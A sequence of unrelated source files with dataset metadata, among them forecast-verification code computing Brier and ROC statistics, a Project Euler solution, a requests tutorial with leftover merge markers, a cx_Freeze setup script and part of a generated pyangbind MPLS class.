        reliability_diagram = np.array(reliability_diagram).T
        roc_diagram = np.array(roc_diagram).T

        far = xr.DataArray(roc_diagram[0], dims={'center': roc_diagram[2]}, coords={'center': roc_diagram[2]})
        hr = xr.DataArray(roc_diagram[1], dims={'center': roc_diagram[2]}, coords={'center': roc_diagram[2]})

        data_merge = xr.merge([brier_skill])
        # Need to figure out reliability scaling and add in here as (x, y)
        data_merge['n_events'] = observed_yes
        data_merge['hit_rate'] = hr
        data_merge['false_alarm_rate'] = far
        data.append(data_merge)

    return xr.concat(data, dim='thresh')
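For reference, the decomposition assembled above (Brier = reliability - resolution + uncertainty) can be restated with plain Python on toy lists. This is an illustrative sketch of the standard Murphy decomposition, not a drop-in for the xarray pipeline; the function name and toy inputs are my own.

```python
# Illustrative sketch (toy lists, not the NBM/URMA DataArrays): the Murphy
# decomposition Brier = reliability - resolution + uncertainty. It recombines
# exactly when every forecast within a bin shares the same value.
def brier_decomposition(forecasts, outcomes, n_bins=10):
    N = len(forecasts)
    o_bar = sum(outcomes) / N                      # overall observed frequency
    uncertainty = o_bar * (1 - o_bar)
    bins = {}
    for f, o in zip(forecasts, outcomes):          # group pairs by probability bin
        k = min(int(f * n_bins), n_bins - 1)
        bins.setdefault(k, []).append((f, o))
    reliability = resolution = 0.0
    for members in bins.values():
        nk = len(members)
        fk = sum(f for f, _ in members) / nk       # mean forecast in the bin
        ok = sum(o for _, o in members) / nk       # observed frequency in the bin
        reliability += nk * (fk - ok) ** 2
        resolution += nk * (ok - o_bar) ** 2
    return reliability / N, resolution / N, uncertainty
```

With forecasts of only 0.1 and 0.9, the three returned terms recombine exactly into the raw Brier score computed directly from (forecast - outcome) squared.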
##################
from scipy.integrate import simps
from sklearn.metrics import auc as auc_calc
from sklearn.metrics import roc_curve
def extract_pqpf_verif_stats(_fhr, _urma):
    nbm_file = glob(nbm_dir + 'extract/nbm_probx_fhr%03d.nc' % _fhr)[0]
    print(nbm_file)

    # Subset the threshold value
    nbm = xr.open_dataset(nbm_file)['probx'].sel(
        y=slice(idx[0].min(), idx[0].max()),
        x=slice(idx[1].min(), idx[1].max()))

    # Subset the times
    nbm_time = nbm.valid
    urma_time = _urma.valid
    time_match = nbm_time[np.in1d(nbm_time, urma_time)].values
    time_match = np.array([t for t in time_match if pd.to_datetime(t) >= start_date])
    time_match = np.array([t for t in time_match if pd.to_datetime(t) <= end_date])

    date0 = pd.to_datetime(time_match[0]).strftime('%Y/%m/%d %H UTC')
    date1 = pd.to_datetime(time_match[-1]).strftime('%Y/%m/%d %H UTC')

    _nbm = nbm.sel(valid=time_match)
    _urma = _urma.sel(valid=time_match)

    nbm_mask, _nbm = xr.broadcast(mask, _nbm)
    urma_mask, _urma = xr.broadcast(mask, _urma)
    _nbm_masked = xr.where(nbm_mask, _nbm, np.nan)
    _urma_masked = xr.where(urma_mask, _urma, np.nan)

    data = []
    for thresh in produce_thresholds[:3]:
        print('Processing f%03d %.2f"' % (_fhr, thresh))
        _nbm_masked_select = _nbm_masked.sel(threshold=thresh) / 100
        bins = np.arange(0, 101, 10)

        N = xr.where(~np.isnan(_nbm_masked_select), 1, 0).sum()
        n = xr.where(_urma_masked > thresh, 1, 0).sum()
        o = n / N
        uncertainty = o * (1 - o)

        reliability_inner = []
        resolution_inner = []
        reliability_diagram = []
        roc_diagram = []  # [[1., 1., 1.]]

        for i, bounds in enumerate(zip(bins[:-1], bins[1:])):
            left, right = np.array(bounds) / 100
            center = round(np.mean([left, right]), 2)

            fk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right),
                          _nbm_masked_select, np.nan)
            nk = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right), 1, 0).sum()
            ok_count = xr.where((_nbm_masked_select > left) & (_nbm_masked_select <= right)
                                & (_urma_masked > thresh), 1, 0).sum()
            ok = ok_count / nk

            _reliability_inner = nk * ((fk - ok) ** 2)
            _reliability_inner['center'] = center
            reliability_inner.append(_reliability_inner)

            _resolution_inner = nk * ((ok - o) ** 2)
            _resolution_inner['center'] = center
            resolution_inner.append(_resolution_inner)

            reliability_diagram.append([center, ok.values])

            hit = xr.where((_nbm_masked_select > center) & (_urma_masked > thresh), 1, 0).sum(dim='valid')
            false_alarm = xr.where((_nbm_masked_select > center) & (_urma_masked <= thresh), 1, 0).sum(dim='valid')
            observed_yes = xr.where(_urma_masked > thresh, 1, 0).sum(dim='valid')
            observed_no = xr.where(_urma_masked <= thresh, 1, 0).sum(dim='valid')

            hit_rate = hit / observed_yes
            false_alarm_rate = false_alarm / observed_no
            roc_diagram.append([false_alarm_rate.mean().values, hit_rate.mean().values, center])

        reliability_inner = xr.concat(reliability_inner, dim='center').sum(dim='center')
        reliability_inner = xr.where(mask, reliability_inner, np.nan)
        reliability = (1 / N) * reliability_inner
        reliability = reliability.mean(dim='valid')

        resolution = (1 / N) * xr.concat(resolution_inner, dim='center').sum(dim='center')

        brier = reliability - resolution + uncertainty
        brier_score = brier.mean().values
        brier_skill = 1 - (brier / o)
        brier_skill_score = brier_skill.mean().values
        brier = brier.rename('brier')
        brier_skill = brier_skill.rename('brier_skill')

        reliability_diagram = np.array(reliability_diagram).T
        roc_diagram = np.array(roc_diagram).T

        # Area under the ROC curve and the associated skill score
        auc = auc_calc(roc_diagram[0], roc_diagram[1])
        roc_ss = 2 * (auc - 0.5)
        print(auc, roc_ss)

        # plt.figure(facecolor='w')
        # plt.plot(roc_diagram[0], roc_diagram[1], 'k-^')
        # plt.xlim([0, 1])
        # plt.ylim([0, 1])
        # for x, y, s in zip(roc_diagram[0], roc_diagram[1], roc_diagram[2]):
        #     plt.text(x, y, s)
        # plt.title('%s %s %s' % (cwa, _fhr, thresh))
        # plt.xlabel('False Alarm Rate')
        # plt.ylabel('Hit Rate')
        # plt.plot(np.arange(0, 1.1, .1), np.arange(0, 1.1, .1), 'k--', linewidth=0.5)
        # plt.grid()
        # plt.show()

        far = xr.DataArray(roc_diagram[0], dims={'center': roc_diagram[2]}, coords={'center': roc_diagram[2]})
        hr = xr.DataArray(roc_diagram[1], dims={'center': roc_diagram[2]}, coords={'center': roc_diagram[2]})

        data_merge = xr.merge([brier_skill])
        data_merge['n_events'] = observed_yes
        data_merge['hit_rate'] = hr
        data_merge['false_alarm_rate'] = far
        # data_merge['auc'] = auc
        # data_merge['roc'] = roc_ss
        print(data_merge)
        data.append(data_merge)

    return xr.concat(data, dim='thresh')
verif_stats = extract_pqpf_verif_stats(48, urma)

# === euler-008.py (repo: jwnichols3/euler, MIT) ===
"""
Euler 008
The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
"""
s = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
largestProduct = 0
consecutive = 13
for i in range(0, len(s) - consecutive + 1):  # + 1 so the final 13-digit window is included
    product = 1
    for j in range(i, i + consecutive):
        product *= int(s[j:j + 1])
    if product > largestProduct:
        largestProduct = product
print(largestProduct)
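As an aside (my own restatement, not part of the original solution), the same scan generalizes to any window size:

```python
# Hypothetical helper: greatest product of `window` adjacent digits in a digit string.
def greatest_adjacent_product(digits, window):
    best = 0
    for i in range(len(digits) - window + 1):
        product = 1
        for d in digits[i:i + window]:
            product *= int(d)
        best = max(best, product)
    return best

print(greatest_adjacent_product("12345", 2))  # 4*5 = 20
```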
14e99718b692526344a6c812d68d72fb84010dda | 900 | py | Python | AI 이노베이션 스퀘어 언어지능 과정/20190430/Day02 HTTP, URLlib, Request05.py | donddog/AI_Innovation_Square_Codes | a04d50db011d25e00d8486146c24124c50242aa7 | [
"MIT"
] | 1 | 2021-02-11T16:45:21.000Z | 2021-02-11T16:45:21.000Z | AI 이노베이션 스퀘어 언어지능 과정/20190430/Day02 HTTP, URLlib, Request05.py | donddog/AI_Innovation_Square_Codes | a04d50db011d25e00d8486146c24124c50242aa7 | [
"MIT"
] | null | null | null | AI 이노베이션 스퀘어 언어지능 과정/20190430/Day02 HTTP, URLlib, Request05.py | donddog/AI_Innovation_Square_Codes | a04d50db011d25e00d8486146c24124c50242aa7 | [
"MIT"
] | null | null | null | <<<<<<< HEAD
#resp = response
import requests
header = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
resp = requests.get("https://www.google.com/search", params={"q":"박보영"}, headers = header)
print(resp.status_code)
print(resp.reason)
print(resp.headers)
print(resp.content)
print(resp.encoding)
resp.encoding = "utf-8"
print(resp.text)
=======
#resp = response
import requests
header = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
resp = requests.get("https://www.google.com/search", params={"q":"박보영"}, headers = header)
print(resp.status_code)
print(resp.reason)
print(resp.headers)
print(resp.content)
print(resp.encoding)
resp.encoding = "utf-8"
print(resp.text)
>>>>>>> 125e15a4c5fcf711dd279c9b18e149867466699e
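A stdlib-only aside (my addition, not part of the lesson file): the query-string handling that `params=` performs in requests can be reproduced with `urllib.parse`, which also makes the UTF-8 percent-encoding of the Korean query visible without any network call.

```python
from urllib.parse import urlencode

# Build the same search URL that requests assembles from params={"q": "박보영"}.
query = urlencode({"q": "박보영"})
url = "https://www.google.com/search?" + query
print(url)  # the Hangul is percent-encoded as UTF-8
```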
# === lidar_download/setup.py (repo: NicoRio42/mapant-scripts, MIT) ===
import sys
from cx_Freeze import setup, Executable

# Raw strings so the Windows-style backslashes are not read as escape sequences.
includefiles = [
    r"lidar_download_settings.json",
    r"parts\parts_tiles\part_1.geojson",
    r"parts\parts_tiles\part_2.geojson",
    r"parts\parts_tiles\part_3.geojson",
    r"parts\parts_tiles\part_4.geojson",
    r"parts\parts_tiles\part_5.geojson",
    r"parts\parts_tiles\part_6.geojson",
    r"parts\parts_tiles_overlap\part_1_overlap.geojson",
    r"parts\parts_tiles_overlap\part_2_overlap.geojson",
    r"parts\parts_tiles_overlap\part_3_overlap.geojson",
    r"parts\parts_tiles_overlap\part_4_overlap.geojson",
    r"parts\parts_tiles_overlap\part_5_overlap.geojson",
    r"parts\parts_tiles_overlap\part_6_overlap.geojson",
]
includes = []
excludes = ["Tkinter"]

setup(
    name="lidar_download",
    version="0.1",
    description="To download lidar files from ftp server",
    options={
        "build_exe": {
            "includes": includes,
            "excludes": excludes,
            "include_files": includefiles,
        }
    },
    executables=[Executable("lidar_download.py", base=None)],
)
# === web_interface/shell_imports.py (repo: omegacore/ease, BSD-3-Clause-LBNL) ===
from account_mgr_app.models import *
from alert_config_app.models import *
from django.contrib.auth.models import User
'''
Use this module to run the imports in the Django shell.
'''

# === twitter_text/regexp/directional_markers_group.py (repo: s51517765/twitter-text-python, MIT) ===
directional_markers_group = r'\u202A-\u202E\u061C\u200E\u200F\u2066\u2067\u2068\u2069'
| 43.5 | 86 | 0.816092 | 13 | 87 | 5.307692 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.369048 | 0.034483 | 87 | 1 | 87 | 87 | 0.452381 | 0 | 0 | 0 | 0 | 0 | 0.632184 | 0.632184 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee92b7e999169e6dd57ac574bfd29f8eb6e3146c | 151 | py | Python | dagster_azure_key_vault/dagster_azure_key_vault/__init__.py | Martin-Carlsson/Dagster-AzureKeyVault | 3bcb9a7ccc09118f02faee839f7b97ad56073c3a | [
"Apache-2.0"
] | 2 | 2022-02-15T23:38:23.000Z | 2022-02-16T08:31:13.000Z | dagster_azure_key_vault/dagster_azure_key_vault/__init__.py | Martin-Carlsson/Dagster-AzureKeyVault | 3bcb9a7ccc09118f02faee839f7b97ad56073c3a | [
"Apache-2.0"
] | null | null | null | dagster_azure_key_vault/dagster_azure_key_vault/__init__.py | Martin-Carlsson/Dagster-AzureKeyVault | 3bcb9a7ccc09118f02faee839f7b97ad56073c3a | [
"Apache-2.0"
] | 1 | 2022-02-09T15:53:59.000Z | 2022-02-09T15:53:59.000Z | """init file helping dagit open the right repo"""
from dagster_azure_key_vault.repositories.azure_key_vault_repo import (
azure_key_vault_repo,
)
| 25.166667 | 71 | 0.801325 | 23 | 151 | 4.869565 | 0.652174 | 0.214286 | 0.348214 | 0.303571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125828 | 151 | 5 | 72 | 30.2 | 0.848485 | 0.284768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ee946a60e543d27580c31943b1f54d43fdeb5d63 | 67,604 | py | Python | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import g_mpls_prot_statistics_pkt_types
import g_mpls_prot_statistics_errors
class show_mpls_rsvp_interface_detail(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-rsvp-interface-one-interface/output/mpls-rsvp-interface-detail/show-mpls-rsvp-interface-detail. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__mpls_rsvp_interface_hello_interval','__mpls_rsvp_interface_hello_tolerance','__mpls_rsvp_interface_hello_status','__mpls_rsvp_interface_te_up_thresholds','__mpls_rsvp_interface_te_down_thresholds','__g_mpls_prot_statistics_pkt_types','__g_mpls_prot_statistics_errors','__mpls_rsvp_interface_active_backup_outsegs','__mpls_rsvp_interface_inactive_backup_outsegs','__mpls_rsvp_interface_duplicate_preempts_dropped','__mpls_rsvp_interface_p2mp_capability','__mpls_rsvp_interface_bypass_interface','__mpls_rsvp_interface_tunnel_name','__mpls_rsvp_interface_bypass_tunnel_interface_name','__mpls_rsvp_interface_bypass_creation_time','__mpls_rsvp_interface_bypass_creation_location','__mpls_rsvp_interface_assoc_bypass_LSPs',)
_yang_name = 'show-mpls-rsvp-interface-detail'
_rest_name = 'show-mpls-rsvp-interface-detail'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__mpls_rsvp_interface_inactive_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-inactive-backup-outsegs", rest_name="mpls-rsvp-interface-inactive-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_p2mp_capability = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-p2mp-capability", rest_name="mpls-rsvp-interface-p2mp-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__mpls_rsvp_interface_active_backup_outsegs = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-active-backup-outsegs", rest_name="mpls-rsvp-interface-active-backup-outsegs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_te_up_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-up-thresholds", rest_name="mpls-rsvp-interface-te-up-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_te_down_thresholds = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)), is_leaf=False, yang_name="mpls-rsvp-interface-te-down-thresholds", rest_name="mpls-rsvp-interface-te-down-thresholds", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__g_mpls_prot_statistics_errors = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_errors.g_mpls_prot_statistics_errors, yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_errors", rest_name="g_mpls_prot_statistics_errors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
self.__mpls_rsvp_interface_duplicate_preempts_dropped = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-duplicate-preempts-dropped", rest_name="mpls-rsvp-interface-duplicate-preempts-dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_hello_tolerance = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-tolerance", rest_name="mpls-rsvp-interface-hello-tolerance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_assoc_bypass_LSPs = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_hello_status = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-hello-status", rest_name="mpls-rsvp-interface-hello-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_bypass_tunnel_interface_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_bypass_creation_time = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_rsvp_interface_hello_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_rsvp_interface_bypass_interface = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__g_mpls_prot_statistics_pkt_types = YANGDynClass(base=YANGListType(False,g_mpls_prot_statistics_pkt_types.g_mpls_prot_statistics_pkt_types, yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='False', extensions=None), is_container='list', yang_name="g_mpls_prot_statistics_pkt_types", rest_name="g_mpls_prot_statistics_pkt_types", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions=None, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='list', is_config=True)
self.__mpls_rsvp_interface_bypass_creation_location = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-rsvp-interface-one-interface', u'output', u'mpls-rsvp-interface-detail', u'show-mpls-rsvp-interface-detail']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-rsvp-interface-one-interface', u'output', u'mpls-rsvp-interface-detail', u'show-mpls-rsvp-interface-detail']
def _get_mpls_rsvp_interface_hello_interval(self):
"""
Getter method for mpls_rsvp_interface_hello_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_interval (uint32)
YANG Description: RSVP Hello interval for the RSVP Interface
"""
return self.__mpls_rsvp_interface_hello_interval
def _set_mpls_rsvp_interface_hello_interval(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_hello_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_hello_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_hello_interval() directly.
YANG Description: RSVP Hello interval for the RSVP Interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_hello_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_hello_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_hello_interval(self):
self.__mpls_rsvp_interface_hello_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-hello-interval", rest_name="mpls-rsvp-interface-hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_hello_tolerance(self):
"""
Getter method for mpls_rsvp_interface_hello_tolerance, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_hello_tolerance (uint32)
YANG Description: RSVP Hello tolerance for the RSVP Interface
"""
return self.__mpls_rsvp_interface_hello_tolerance
def _set_mpls_rsvp_interface_hello_tolerance(self, v, load=False):
"""
